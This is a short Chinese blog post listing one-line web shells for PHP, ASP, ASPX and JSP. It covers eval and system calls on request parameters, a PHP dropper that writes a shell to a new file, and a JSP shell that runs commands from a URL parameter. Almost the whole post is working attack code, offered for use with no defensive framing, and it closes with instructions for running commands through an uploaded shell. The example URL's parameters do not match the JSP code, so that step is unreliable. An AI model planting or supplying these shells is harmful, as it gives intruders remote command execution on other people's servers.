一句话木马

php的一句话木马:

<?php phpinfo();?>

<?php @eval($_POST['a']);?>

<?php eval(@$_POST['a']); ?>

<?php eval($_POST[a])?>

<?php system($_REQUEST['cmd']);?>

<?php assert($_POST[c]);?>

<?fputs(fopen(c.php,w),<?eval($_POST[c]);?>)?>

<?php fputs( fopen('123.php','w') , '<? php eval($_POST[123]) ?>' ) ; ?>
将当前目录下创建123.php文件,并且将一句话木马写入123.php中

asp的一句话是:

<%eval request ("a")%>

<%execute request("a")%>

<%execute(request("a"))%>

 

aspx的一句话是:

<%@ Page Language="Jscript"%> <%eval(Request.Item["a"],"unsafe");%>

jsp木马

<%
if("123".equals(request.getParameter("a"))){
java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
int a = -1;
byte[] b = new byte[2048];
out.print("<pre>");
while((a=in.read(b))!=-1){
out.println(new String(b));
}
out.print("</pre>");
}
%>
成功上传后如果能解析的话,请求:http://服务器IP+端口/cmd.jsp?pwd=a&i=ipconfig 即可执行命令。

posted @ 2021-06-09 10:03  我有清茶与酒  阅读(381)  评论(0)    收藏  举报